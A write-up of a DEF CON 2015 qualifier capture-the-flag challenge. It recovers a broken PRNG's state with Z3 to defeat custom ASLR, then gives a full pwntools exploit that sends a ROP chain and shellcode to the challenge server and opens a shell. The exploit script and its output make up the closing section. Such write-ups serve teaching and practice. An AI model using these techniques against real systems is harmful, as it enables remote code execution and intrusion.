TL;DR – continuous custom ASLR using a broken PRNG. Collect outputs, SAT solve for the initial state, predict next base address, ROP to victory.

This is a bit of a tour through my first use of Z3 on a CTF challenge, and **might** be useful other Z3 noobs trying to figure out how to get started.

# Background

I’ve bounced off Z3 a couple of times over the last few years. I’d heard that it was useful (or indeed borderline necessary) for solving certain types of CTF challenges – particularly “keygen” style ones, which have always been a weak point for me.

I had a play around with Z3py during Plaid this year, and thought I had the basics down. Being from a development background, it’s quite a paradigm shift (ding, achievement unlocked) to consider that code you’re writing doesn’t actually *calculate* things, or do any of the operations it looks like it’s doing – it just sets up a series of conditions which need to be met.

So, when I reached a certain point of “fuckup” – a pwnable challenge during DEF CON 2015 CTF qualifiers, and it looked like a SAT solver might be the answer, I thought I’d have another go at cracking how to use Z3.

I haven’t found a good comprehensive guide to using Z3 to solve CTF-style problems before, so this is my attempt to create one. Please bear in mind I’m a complete Z3/SAT noob and this might be a baaaaad approach. If you know any better I’d very much appreciate some feedback ðŸ™‚

# fuckup

This was a 3-point pwnable challenge in DEFCON 2015 CTF qualifiers. We have the binary and are told it’s running on a certain port on a remote server. On connection the binary says:

1 2 3 4 5 6 7 8 9 10 |
Welcome to Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization, the new and improved ASLR. This app is to help prove the benefits of F.U.C.K.U.P. Main Menu --------- 1. Display info 2. Change random 3. View state info 4. Test stack smash ------- 0. Quit |

Choosing 1 gives us more information:

1 2 3 |
Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization is a new method where the binary is constantly moving around in memory. It is also capable of moving the stack around randomly and will be able to move the heap around in the future. |

Disassembling the code leads us to a function at 0x080481A6 which we’ll call “move_to_new_location”. Simplifying slightly, this function:

- iterates a PRNG,
- does some annoying floating point operations on the random value,
- maps a read-write buffer at the random address,
- copies across the binary from its current mapped location,
- mprotects the .text segment to be read-execute,
- switches execution to the same function but in the newly mapped area,
- unmaps the previous area,
- moves the stack (I think – this ended up not being important).

We are able to get information on the current random value using menu option 3, which on subsequent runs outputs:

- Current Random: f6f8df10
- Current Random: 728e8aa9
- Current Random: 15852476
- etc

This shows that relocation is happening quite a lot. Checking the binary, relocation is called (again, simplifying) once each time we perform a menu action. Menu option 4 gives us a free stack smash, **but** the binary and stack are randomly moved around before the smash occurs.

The approach I used was to try to:

- predict the next PRNG output, therefore knowing the new program base address,
- then use the stack buffer overflow to build a simple ROP chain,
- which mmaps some writable memory, reads in some shellcode, and jumps to it.

## PRNG state reconstruction

I spent a while looking at the code for the PRNG iteration function – thank you Hex-Rays decompiler for saving me a lot of time! Eventually I remembered that you should google constants, and there was a juicy one in the routine: 0xDA442D24. This took me to an implementation of Well512, a PRNG (the cleanest I could find is in here).

After poring over it for a while, I noticed that the CTF challenge implementation has a (deliberate) bug which means that the effect of an interation on the internal PRNG state is wider than intended, which I **think** builds stronger logical links between parts of the state, making it easier to solve. This is supposition, since a comment in IRC by the creator said that making that change made it trivially SAT-solvable.

This is the the PRNG iteration routine reversed out:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
long double prng_iterate() { int v0; // edi@0 int v1; // edi@1 int idx; // ebx@1 signed __int64 v4; // ST08_8@1 _DWORD *state_ptr; // ST04_4@1 int current_value_at_idx; // ST00_4@1 int v7; // eax@1 int v8; // ecx@1 unsigned int v9; // eax@1 idx = ::state_index v4 = ((_BYTE)idx + 0xF) & 0xF; state_ptr = &prng_state[((_BYTE)idx + 0xF) & 0xF]; current_value_at_idx = *state_ptr; v7 = prng_state[((_BYTE)idx + 13) & 0xF] ^ prng_state[idx] ^ (prng_state[idx] << 16) ^ (prng_state[((_BYTE)idx + 13) & 0xF] << 15); v8 = prng_state[((_BYTE)idx + 9) & 0xF] ^ (prng_state[((_BYTE)idx + 9) & 0xF] >> 11); prng_state[((_BYTE)idx + 10) & 0xF] = v8 ^ v7; // This is different to the reference implementation! v9 = 32 * (v8 ^ v7) & 0xDA442D24 ^ v8 ^ v7 ^ v7 ^ current_value_at_idx ^ 4 * current_value_at_idx ^ (v7 << 18) ^ (v8 << 28); *state_ptr = v9; ::state_index = (idx+0xF) & 0xF; return (long double)v9 * 2.3283064e-10; // Corrected in the caller } |

My hunch was that collecting enough output from this and feeding it into a SAT solver would allow us to recreate the initial state. So I used Z3py to re-create the algorithm and feed in the gathered results, then solve for the initial state. It’s important to note again here that the code in the “iteration” function isn’t **actually** doing any computation. It is setting up a large set of logical bitwise operators, really a set of simultaneous equations. Then when we add some actual numbers into the mix Z3 will solve these equations.

Here is my eventual source which could predict the next PRNG output:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
prng_state = [BitVec("init_{0}".format(i), 32) for i in range(16)] def iteration(i): # Important note: Z3py's right-shift BitVec operator appears to do arithmetic # shifts! This took a LONG time to track down and then fix by replacing it # with LShR (Logical Shift Right). b = prng_state[(i+13)&15] ^ prng_state[i] ^ (prng_state[i] << 16) ^ (prng_state[(i+13)&15] << 15) c = prng_state[(i+9)&15] ^ ( LShR(prng_state[(i+9)&15], 11) ) prng_state[(i+10)&15] = c ^ b next_i = (i+15)&15 a = prng_state[next_i]< v9 = (((32 * (c ^ b)) & 0xDA442D24) ^ c ^ b)^ b ^ a ^ (a << 2) ^ (b << 18) ^ (c << 28) prng_state[next_i] = v9 return next_i # Gather outputs from the challenge PRNG here. s = Solver() for output in outputs: it = iteration(it) s.add(prng_state[it] == output) status = s.check() print status |

Looking at the Z3 model then allows us to extract the initial state for all bar one of the values. The one that we don’t know (the DWORD at index 9) is immaterial because it is immediately replaced on the first iteration of the PRNG, without being used. Here is the output from the Z3 model:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
[init_11 = 227239670, init_1 = 356243134, init_6 = 2924252025, init_12 = 671847717, init_15 = 4278934068, init_10 = 2920231387, init_8 = 3100976451, init_7 = 3877383204, init_13 = 2504210820, init_4 = 946398149, init_2 = 2920272070, init_5 = 1613222373, init_3 = 1350796265, init_14 = 3143250295, init_0 = 2825226641] |

## Steps along the way

At this point I feel like I’ve given another “just solve it using Z3” CTF solution. This is what I felt about all the Z3 write-ups I’d seen until this point, and I was hoping to write one differently! So, here is how I approached one of the setbacks. If you just want the solution, skip to the end.

I wanted to make sure that my implementation of the code would produce the same outputs as the real PRNG. To do this I gathered an initial state from the binary using GDB and set those up as the inputs to Z3. Then I used the “simplify” function to collapse the Z3 logic. Normally this will give you a large set of conditions, but since the initial states were all known, Z3 will give a numerical value for each eventual PRNG state.

For my initial, **incorrect** implementation of the algorithm this checking code looked like this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 |
from z3 import * import struct prng_state = [BitVec("init_{0}".format(i), 32) for i in range(16)] def iteration(i): next_i = (i+15)&15 b = prng_state[(i+13)&15] ^ prng_state[i] ^ (prng_state[i] << 16) ^ (prng_state[(i+13)&15] << 15) c = prng_state[(i+9)&15] ^ ( prng_state[(i+9)&15] >> 11 ) prng_state[(i+10)&15] = c ^ b a = prng_state[next_i] v9 = (((32 * (c ^ b)) & 0xDA442D24) ^ c ^ b)^ b ^ a ^ (a << 2) ^ (b << 18) ^ (c << 28) prng_state[next_i] = v9 return next_i after_0_state_dump = """ 0xf7ffc000: 0xef590f88 0x83ad59d1 0xd93c8e23 0x4430ec95 0xf7ffc010: 0x4bbed9c8 0x63c41b2f 0xa8917a45 0xf4cba336 0xf7ffc020: 0xc0ba8afc 0x442c47eb 0xabfadd00 0x24784029 0xf7ffc030: 0xa2012fe8 0x477a90eb 0x68fdf575 0xf79fcc39 """ after_1_state_dump = """ 0xf7ffc000: 0xef590f88 0x83ad59d1 0xd93c8e23 0x4430ec95 0xf7ffc010: 0x4bbed9c8 0x63c41b2f 0xa8917a45 0xf4cba336 0xf7ffc020: 0xc0ba8afc 0xcef17e7c 0xabfadd00 0x24784029 0xf7ffc030: 0xa2012fe8 0x477a90eb 0x8ee8b00c 0xf79fcc39 """ def dump_to_values(dump): lines = dump.split("\n")[1:] just_data = "\n".join([line[12:] for line in lines]) just_data = just_data.replace("0x","").replace("\n"," ").replace(" "," ").rstrip() values = [int(v,16) for v in just_data.split(" ")] return values after_0_values = dump_to_values(after_0_state_dump) after_1_values = dump_to_values(after_1_state_dump) # Set up the inital known state for i in range(16): prng_state[i] = BitVecVal( after_0_values[i], 32 ) # Do one iteration, this will have the index of 15, since it starts at zero # and is reduced by one each time (and we've already been through one # iteration to get to this point) iteration(15) # Now check the results equal the expected gathered state for i in range(16): simplified = simplify( prng_state[i] ) try: val = int(str(simplified)) if val == after_1_values[i]: print "Match on state {0}: {1:x} == {2:x}".format(i, val, after_1_values[i]) else: print "*** Mismatch on state {0}: {1:x} != {2:x}".format(i, val, after_1_values[i]) except: print "Not fully simplified: ", simplified |

This showed that the algorithm was broken, with the following output:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
Match on state 0: ef590f88 == ef590f88 Match on state 1: 83ad59d1 == 83ad59d1 Match on state 2: d93c8e23 == d93c8e23 Match on state 3: 4430ec95 == 4430ec95 Match on state 4: 4bbed9c8 == 4bbed9c8 Match on state 5: 63c41b2f == 63c41b2f Match on state 6: a8917a45 == a8917a45 Match on state 7: f4cba336 == f4cba336 Match on state 8: c0ba8afc == c0ba8afc *** Mismatch on state 9: 31117e7c != cef17e7c Match on state 10: abfadd00 == abfadd00 Match on state 11: 24784029 == 24784029 Match on state 12: a2012fe8 == a2012fe8 Match on state 13: 477a90eb == 477a90eb *** Mismatch on state 14: a908b00c != 8ee8b00c Match on state 15: f79fcc39 == f79fcc39 |

Now we had the problem of diagnosing Z3 logic. We could run the function with just numbers and it worked fine, so something was up. But as far as I know you can’t debug Z3 code, because it’s not really performing the operations, it’s just setting up logic so that they can be run in the future. What I did in the end was deliberately break the algorithm in order to store sub-elements of the result in the PRNG state instead. For example, to check what “c” was being calculated as I changed

1 |
prng_state[(i+10)&15] = c ^ b |

to

1 |
prng_state[(i+10)&15] = c |

Looking at this number and performing the actual expected operations I found that it wasn’t producing the output I expected. After looking at all the elements I found that this wasn’t doing what I expected:

1 |
( prng_state[(i+9)&15] >> 11 ) |

In python, “>>” operator performs a logical right shift, eg:

1 |
0xFFFFFFFF >> 8 == 0x00FFFFFF |

**However**, Z3 objects treats the “>>” as an **arithmetic** right shift. This essentially means that bit vectors are treated as signed numbers, and extends the sign, meaning:

1 |
BitVec(0xFFFFFFFF) >> 8 == 0xFFFFFFFF |

So around half of the time, my algorithm was breaking. After fixing that I got the pleasant output of:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
Match on state 0: ef590f88 == ef590f88 Match on state 1: 83ad59d1 == 83ad59d1 Match on state 2: d93c8e23 == d93c8e23 Match on state 3: 4430ec95 == 4430ec95 Match on state 4: 4bbed9c8 == 4bbed9c8 Match on state 5: 63c41b2f == 63c41b2f Match on state 6: a8917a45 == a8917a45 Match on state 7: f4cba336 == f4cba336 Match on state 8: c0ba8afc == c0ba8afc Match on state 9: cef17e7c == cef17e7c Match on state 10: abfadd00 == abfadd00 Match on state 11: 24784029 == 24784029 Match on state 12: a2012fe8 == a2012fe8 Match on state 13: 477a90eb == 477a90eb Match on state 14: 8ee8b00c == 8ee8b00c Match on state 15: f79fcc39 == f79fcc39 |

And from then on it was a case of collecting outputs as in the previous code.

## How did I know it was solvable?

I didn’t. I don’t know how you judge that a particular algorithm is solvable using a particular set of inputs in a reasonable amount of time. I had a hunch that Z3 might help, and I went with that. I’m sure there’s a better way ðŸ™‚

# Full solution

Once I had code to do the Z3 bit the rest was fairly simple plumbing. I knew the address the binary would be at, so I made a simple ROP chain to map an area of executable memory, read from the socket into it, and then transfer execution to it. And here we are:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 |
#!/usr/bin/python from z3 import * from pwnlib.util.packing import * from pwn import * # <3 pwntools, thanks guys :) prng_state = [BitVec("init_{0}".format(i), 32) for i in range(16)] def un32(v) : return v & 0xffffffff # PRNG iteration that works with Z3 bit vectors def iteration(i): next_i = (i+15)&15 b = prng_state[(i+13)&15] ^ prng_state[i] ^ (prng_state[i] << 16) ^ (prng_state[(i+13)&15] << 15) c = prng_state[(i+9)&15] ^ ( LShR(prng_state[(i+9)&15], 11) ) prng_state[(i+10)&15] = c ^ b a = prng_state[next_i] v9 = (((32 * (c ^ b)) & 0xDA442D24) ^ c ^ b)^ b ^ a ^ (a << 2) ^ (b << 18) ^ (c << 28) prng_state[next_i] = v9 return next_i # PRNG iteration that works with normal numbers! def iteration_numbers(i): next_i = (i+15)&15 b = prng_state[(i+13)&15] ^ prng_state[i] ^ un32(prng_state[i] << 16) ^ un32(prng_state[(i+13)&15] << 15) c = prng_state[(i+9)&15] ^ ( prng_state[(i+9)&15] >> 11 ) prng_state[(i+10)&15] = c ^ b a = prng_state[next_i] v9 = (((32 * (c ^ b)) & 0xDA442D24) ^ c ^ b)^ b ^ a ^ un32(a << 2) ^ un32(b << 18) ^ un32(c << 28) prng_state[next_i] = v9 return next_i def iteration_attempts(outputs): global prng_state s = Solver() it = 15 for output in outputs: it = iteration(it) s.add(prng_state[it] == output + 1) return s #r = process("./fuckup_noalarm") r = remote("fuckup_56f604b0ea918206dcb332339a819344.quals.shallweplayaga.me", 2000) log.info("Gathering random outputs...") # Gather the first 15 random outputs outputs = list() for i in range(16): r.recvuntil("Quit\n") r.send("3\n") response = r.recvline() current_random = int(response.split(" ")[2], 16) outputs.append(current_random) s = iteration_attempts(outputs) status = s.check() print status log.info("Solving for inital state...") # This will be our calculated initial state init_state = dict() # Get numbers out of the model try: model = s.model() #print model for k in model: idx = int(str(k)[5:]) val = model[k].as_long() init_state[idx]=val except: raise log.info("Calculating next value...") # Now iterate it forwards. for i in range(16): if i in init_state: prng_state[i] = init_state[i] else: # We're missing a couple, but they don't matter as they only # rely on things we do know. prng_state[i] = 0 # Start just after the first iteration, as that's the state we know it = 15 for i in range(16): it = iteration_numbers(it) # Now we can get the next value it = iteration_numbers(it) next_random_value = prng_state[it] - 1 log.info("Prediction: 0x{0:x}".format(next_random_value)) next_base = 0xFFFFF000 & next_random_value offset = next_base - 0x8048000 # Start the stack smash r.send("4\n") mmap_addr = un32(0x08048754 + offset) consume7dwords_ret = un32(0x08048A98 + offset) read_addr = un32(0x080488AF + offset) # Where to map and store the shellcode sc_addr = 0x13370000 rop_chain = ( mmap_addr, # mmap( addr, len, prot, flags, fd, offset ) consume7dwords_ret, # where to jump after mmap sc_addr, # addr 0x2000, # len 7, # prot 34, # flags 0xffffffff, # fd 0, # offset 0x41414141, # padding read_addr, # read( fd, addr, size ) sc_addr, # where to jump after the read 0, # stdin sc_addr, # where to write to 0x2000, # len ) rop_data = "".join([p32(v) for v in rop_chain]) payload = "P"*0x16 + rop_data payload += "B"*(100-len(payload)) # pad out to 100 bytes, possibly not important log.info("Sending shellcode...") r.send(payload) # Now send the shellcode sc = asm(shellcraft.i386.linux.sh()) r.send(sc) # Shell! log.info("Shell! Hopefully :)") r.interactive() |

And the output:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
[+] Opening connection to fuckup_56f604b0ea918206dcb332339a819344.quals.shallweplayaga.me on port 2000: Done [*] Gathering random outputs... sat [*] Solving for inital state... [*] Calculating next value... [*] Prediction: 0x2a3e6499 [*] Sending shellcode... [*] Shell! Hopefully :) [*] Switching to interactive mode Main Menu --------- 1. Display info 2. Change random 3. View state info 4. Test stack smash ------- 0. Quit Input buffer is 10 bytes in size. Accepting 100 bytes of data. This will crash however the location of the stack and binary are unknown to stop code execution $ id uid=1001(fuckup) gid=1001(fuckup) groups=1001(fuckup) $ cat /home/fuckup/flag The flag is: z3 always helps |